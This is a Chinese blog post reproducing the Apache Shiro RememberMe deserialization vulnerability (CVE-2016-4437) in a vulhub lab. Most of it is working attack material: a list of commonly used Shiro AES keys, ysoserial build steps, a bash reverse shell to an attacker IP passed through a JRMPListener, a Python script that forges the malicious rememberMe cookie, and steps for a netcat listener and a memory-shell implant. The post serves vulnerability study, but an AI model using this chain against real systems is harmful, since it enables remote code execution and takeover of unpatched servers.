shiro反序列化漏洞复现(CVE-2016-4437 )

最新推荐文章于 2025-05-10 17:02:36 发布
原创 最新推荐文章于 2025-05-10 17:02:36 发布 · 2.1k 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #安全 #测试工具

文章介绍了ApacheShiro框架中的CVE-2016-4437漏洞,涉及RememberMe功能的加密数据验证问题。详细描述了漏洞原理、影响范围、复现步骤,以及如何利用ysoserial工具进行攻击和修复建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、简介

Apache Shiro是一个强大且易于使用的Java安全框架,提供认证、授权、加密以及会话管理功能。CVE-2016-4437具体涉及了Apache Shiro在使用记住我(RememberMe)功能时的反序列化漏洞。

2、漏洞原理

原因在于Apache Shiro对加密的RememberMe cookie的处理。在正常情况下,RememberMe功能让用户在返回网站时不用再次登录。为了提供这种功能,Shiro需要在客户端和服务器之间安全地传输身份验证数据。Shiro通过使用AES加密算法加密身份验证数据来实现这一点,然后将加密后的数据存储在cookie中。但是由于Shiro在版本1.2.4之前没有正确地验证加密数据,导致了可能的漏洞

3、影响范围

Apache Shiro <= 1.2.4

4、启动环境

利用docker启动vulhub环境

浏览器访问靶机IP加8080端口,搭建成功页面。

5、漏洞复现

随意输入账密点击登录并burp抓包,返回包中存在rememberMe=deleteMe字段,证明使用了shiro框架(注意:返回包中存在ememberMe=deleteMe字段,只能证明使用了shiro,并不能代表一定存在反序列化漏洞)

burp插件ShiroScan,检测到可能存在漏洞(八九不离十是存在漏洞的)

 ​​​​​​​简单说一下插件的安装,将下载好的包解压,参考下图添加插件。插件地址

上工具爆破key工具地址

可以命令执行

shiro反序列化常用key

kPH+bIxk5D2deZiIxcaaaA==
2AvVhdsgUs0FSA3SDFAdag==
3AvVhmFLUs0KTA3Kprsdag==
4AvVhmFLUs0KTA3Kprsdag==
5aaC5qKm5oqA5pyvAAAAAA==
6ZmI6I2j5Y+R5aSn5ZOlAA==
bWljcm9zAAAAAAAAAAAAAA==
wGiHplamyXlVB11UXWol8g==
Z3VucwAAAAAAAAAAAAAAAA==
MTIzNDU2Nzg5MGFiY2RlZg==
zSyK5Kp6PZAAjlT+eeNMlg==
U3ByaW5nQmxhZGUAAAAAAA==
4AvVhmFLUs0KTA3Kprsdcg==
5AvVhmFLUs0KTA3Kprsdag==
bXdrXl9eNjY2KjA3Z2otPQ==
fCq+/xW488hMTCD+cmJ3aQ==
1QWLxg+NYmxraMoxAXu/Iw==
ZUdsaGJuSmxibVI2ZHc9PQ==
L7RioUULEFhRyxM7a2R/Yg==
r0e3c16IdVkouZgk1TKVMg==
bWluZS1hc3NldC1rZXk6QQ==
a2VlcE9uR29pbmdBbmRGaQ==
WcfHGU25gNnTxTlmJMeSpw==

 输入如下命令克隆ysoserial工具源码。或直接离线下载(本文是离线下载)

git clone https://github.com/frohoff/ysoserial.git

解压进入ysoserial-master目录

unzip ysoserial-master.zip

cd ysoserial-master

输入如下命令编译打包

mvn package -D skipTests    (需要安装maven方可使用mvn命令)

编译打包的过程中遇到了报错,提示缺少该javax.interceptor-api:jar:3.1依赖。

解决方法:需要更新maven的仓库源

mvn -version    #查看maven的安装目录

进入以下目录

cd /usr/local/maven/apache-maven-3.9.6/conf

添加阿里云仓库源

vim settings.xml

<mirror>
      <id>alimaven</id>
      <name>aliyun maven</name>
       <url>http://maven.aliyun.com/nexus/content/groups/public/</url>
      <mirrorOf>central</mirrorOf>
</mirror>

重新输入以下命令编译打包

mvn package -D skipTests

编译打包成功

 反弹shell,构造反弹shell命令并进行加密。推荐地址

bash -i >& /dev/tcp/192.168.15.128/4444 0>&1

利用ysoserial中的JRMP监听模块,监听6666端口并且执行反弹shell命令

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1LjEyOC80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}'

构造cookie内容生成payload。

python shiro.py 192.168.15.128:6666

shiro.py脚本内容如下

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    print ("rememberMe={0}".format(payload.decode()))

如果出现下图报错,执行下面命令解决

​​​​​​​

pip uninstall crypto pycryptodome
pip install pycryptodome

nc监听4444端口

nc -lvvp 4444

利用burp,将生成的payload插入至cookie中。

正常情况会反弹shell,很烦,这里没有反弹成功,但是JRMP是有回显的

生气,很生气,有知道的大佬给点意见,是哪里出现了问题还是其他原因。

利用工具注入内存马

上蚁剑连接

连接成功

6、修复建议

根据官方要求将shiro升级至无漏洞版本。

网安-Dream
关注
shiro反序列化漏洞复现CVE-2016-4437
m0_70349048的博客
05-19 764
cookie的key为RememberMe,cookie的值是经过相关信息进行序列化,然后使用AES加密(对称),最后再使用Base64编码处理。,这意味着攻击者只要通过源代码找到AES加密的密钥,就可以构造一个恶意对象,对其进行序列化,AES加密,Base64编码,然后将其作为cookie的Remember Me字段发送,Shiro将RememberMe进行解密并且反序列化,最终造成反序列化漏洞。将生成的payload复制到请求包cookie的位置, 发包。可以看到,已经能够远程执行任意命令了。
CVE-2016-4437 Shiro反序列化漏洞复现
weixin_45260839的博客
05-15 3021
CVE-2016-4437 Shiro反序列化漏洞复现
Apache Shiro 1.2.4反序列化漏洞CVE-2016-4437
m0_61506558的博客
11-06 2899
关于shiro在2019年爆出来的漏洞,利用的条件相对来说比较苛刻,不仅要有一定的权限登入进去,进去之后密钥爆破也不一定可以成功,环境不好搭建,感兴趣的师傅可以看看,本篇文章介绍的是有关shiro反序列化漏洞(一)基本介绍。
Apache Shiro 1.2.4 反序列化漏洞CVE-2016-4437)
最新发布
spinage的博客
05-10 483
攻击者可利用该漏洞通过伪造的 RememberMe Cookie 触发恶意代码执行
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
总有人间一两风,填我十万八千梦
03-28 1万+
Shiro 1.2.4 反序列化漏洞
CVE-2016-4437---Shiro反序列化漏洞
qq_44880255的博客
08-10 4182
1、影响版本 Apache Shiro <= 1.2.4 2、漏洞原因 Apache Shiro默认使用了CookieRememberMeManager。其处理cookie的流程是: 得到rememberMe的cookie值;Base64解码;AES解密;反序列化。 然而AES的密钥是硬编码的,即AES加解密的密钥是写死在代码中的,攻击者可以构造恶意数据造成反序列化漏洞。 3、漏洞复现 这里使用的环境是Kali中的vulhub和docker。 首先进入目录vulhub/shiro/CVE-2016
Shiro 漏洞复现CVE-2016-4437
qq_42699326的博客
11-23 1040
CVE-2016-4437 是一个认证绕过漏洞Shiro 在使用 Cookie 存储会话信息时,未对。
Shiro550 反序列化漏洞CVE-2016-4437
qq_68163788的博客
06-20 1283
Apache Shiro是一个强大而易用的Java安全框架,专注于提供认证、授权、加密和会话管理等安全功能。Shiro旨在简化安全性,通过直观的设计和简单的API使安全功能的集成变得轻松。开发人员可以选择多种认证方式,灵活地管理用户的角色和权限,以确保对资源的安全访问。此外,Shiro还提供了便捷的加密工具,用于保护敏感数据的存储和传输。综合来看,Apache Shiro是一款功能全面且易于使用的安全框架,为开发人员提供了完善的安全解决方案,帮助他们构建安全可靠的应用程序。
shiro反序列化漏洞详解与复现shiro-550/CVE-2016-4437
ccccai22的博客
08-28 377
shiro反序列化漏洞shiro-550/CVE-2016-4437
Shiro721 反序列化漏洞CVE-2019-12422)
qq_68163788的博客
06-21 2580
Apache Shiro 是一个功能强大且灵活的开源安全框架,可以干净地处理身份验证,授权,企业会话 Management 和加密。 Apache Shiro 的首要目标是易于使用和理解。安全有时可能非常复杂,甚至会很痛苦,但不一定如此。框架应尽可能掩盖复杂性,并公开干净直观的 API,以简化开发人员确保其应用程序安全的工作。
Apache shiro550 CVE-2016-4437复现
weixin_65582330的博客
03-20 1042
填好目标地址,然后爆破密钥,用已知的密钥库爆破,然后检测当前的利用链,再爆破利用链,利用链可以进行选择,一个不行就换下一个。apache shiro提供了登录信息保存的功能,服务器在验证用户身份的过程中有反序列化操作,这是导致漏洞的主要原因。随便输入账号密码进行抓包,可以看到有rememberme=remember-me,为shiro的特征。这时就会让服务器访问我们建立好的JRMP的服务,然后让服务器反弹连接到攻击机的7777端口。然后再手动复现一遍:下面是大概的利用方式。# 生成随机16位长度的IV。
shiro CVE-2016-4437 漏洞复现
qq_40646572的博客
05-09 1062
shiro550漏洞漏洞点就在于用户信息反序列化可利用,并且加密的key值给了一个固定的默认值的,导致很多开发人员直接使用,接着导致了洞的产生。
漏洞复现shiro 反序列化CVE-2016-4437
m0_61101264的博客
09-11 348
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。
Shiro-CVE-2016-4437 漏洞复现(vulhub靶场搭建)
zzxyccxc的博客
09-12 1271
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
Apache shiro反序列化CVE-2016-4437复现
weixin_49848824的博客
07-09 946
一、原理分析Shiro提供了记住我(RememberMe)的功能,比如访问淘宝等网站时,关闭了浏览器下次再打开时还是能够记住上次访问过的用户,下次访问时无需再登录即可访问Shiro会对cookie中的Remember me字段进行相关处理:序列化-->AES加密-->base64编码由于Shiro本身含有一个预设的AES密钥Base64.decode("KPHblxk5D2deZilxcaaaA=="),每个人都能够通过源代码拿到该密钥,因此攻击者可以构造一个恶意的对象,对其进行序列化并用该密钥进行加密,b
[CVE-2016-4437] Apache Shiro 安全框架反序列化漏洞复现与原理详细分析
Specif1c的博客
10-21 5508
Apache Shiro是一个强大且易用的 Java安全框架,执行身份验证、授权、密码和会话管理。shiro 相比于 springsecurity 简单许多,官方号称 10 分钟就能学会。shiro 反序列化漏洞Java 经典漏洞,于2016年被挖掘出来,到现在依旧很多系统存在该漏洞,非常值得学习,对加深 shiro 认证机制的理解以及java代码审计颇有帮助。
Apache Shiro 反序列化(CVE-2016-4437)复现
m0_48520508的博客
08-03 1745
0x01简介 这个漏洞属于java反序列化漏洞的一种,shirojava的一个开发框架执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 官网漏洞说明:https://issues.apache.org/jira/browse/SHIRO-550 Apache Shiro框架提供了记住我(RememberMe)的功能,关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRemember
shiro-cve_2016_4437漏洞复现
0day
01-29 930
shiro-cve_2016_4437漏洞复现 漏洞概述: 该漏洞发布于2016年6月,属于java反序列化漏洞的一种,Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。Apache Shiro框架提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe
CVE-2016-4437漏洞、搭建、复现,rememberMe组成情况【shiro-1.2.4】、验证过程、各种利用链、各种回显方式
热门推荐
芜湖~米汤来喽~
01-16 2万+
CVE-2016-4437漏洞、搭建、复现,rememberMe组成情况【shiro-1.2.4】、验证过程、各种利用链、各种回显方式
cve-2016-4437
02-13
### CVE-2016-4437 漏洞详情 CVE-2016-4437 是 Apache Shiro 中的一个严重反序列化漏洞,该漏洞允许攻击者通过精心构造的 `rememberMe` cookie 执行远程代码。Apache Shiro 使用了 Java 的原生对象序列化机制来处理记住我功能中的用户凭证存储和恢复操作。 当客户端发送带有恶意构造的 `rememberMe` 值时,在服务器端执行如下流程:取出请求包中 `rememberMe` 的 cookie 值 => Base64 解码 => AES 解密 (用到密钥) => 反序列化[^4]。如果此时传入的数据被篡改,则可能导致任意代码被执行。 ### 影响范围 此漏洞影响所有使用默认配置启用了 "Remember Me" 功能的应用程序版本低于 1.2.4 和 1.3.x 版本低于 1.3.1 的 Apache Shiro 库实例。由于许多 Web 应用依赖于此类身份验证框架,因此潜在受影响面广泛,特别是那些未及时更新至安全补丁版的企业级应用系统[^2]。 ### 解决方案 为了防止利用这一缺陷实施攻击,建议采取以下措施之一: #### 方法一:升级库文件 最直接有效的方式是尽快将使用的 Shiro 库升级到最新稳定版本,如 1.2.4 或更高版本对于长期支持分支;如果是开发新项目则推荐采用最新的主要发行版。官方已经发布了解决该问题的安全更新,并且后续版本也加强了对此类风险点的关注与防护力度。 #### 方法二:禁用 RememberMe 功能 如果不必要的话可以选择关闭应用程序内的 “Remember Me” 登录选项。这可以通过调整配置参数实现,具体做法取决于所集成的具体方式以及平台特性。这样做虽然牺牲了一定用户体验便利性但是能彻底消除与此特性相关的安全隐患。 #### 方法三:自定义加密算法 另一种可行的办法是对原有的加解密逻辑进行改造,替换掉存在隐患的标准组件而选用更稳健可靠的第三方替代品或是自行设计一套基于现代密码学原理的新方案。例如引入像 BCrypt 这样的强哈希函数用于数据保护而非简单的对称秘钥变换过程。 ```java // 示例代码展示如何设置Shiro环境变量以禁用RememberMe功能 import org.apache.shiro.config.IniSecurityManagerFactory; import org.apache.shiro.mgt.SecurityManager; public class DisableRememberMe { public static void main(String[] args){ IniSecurityManagerFactory factory = new IniSecurityManagerFactory(); SecurityManager securityManager = factory.getInstance(); // 关闭RememberMe管理器 ((DefaultWebSecurityManager)securityManager).setRememberMeManager(null); } } ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值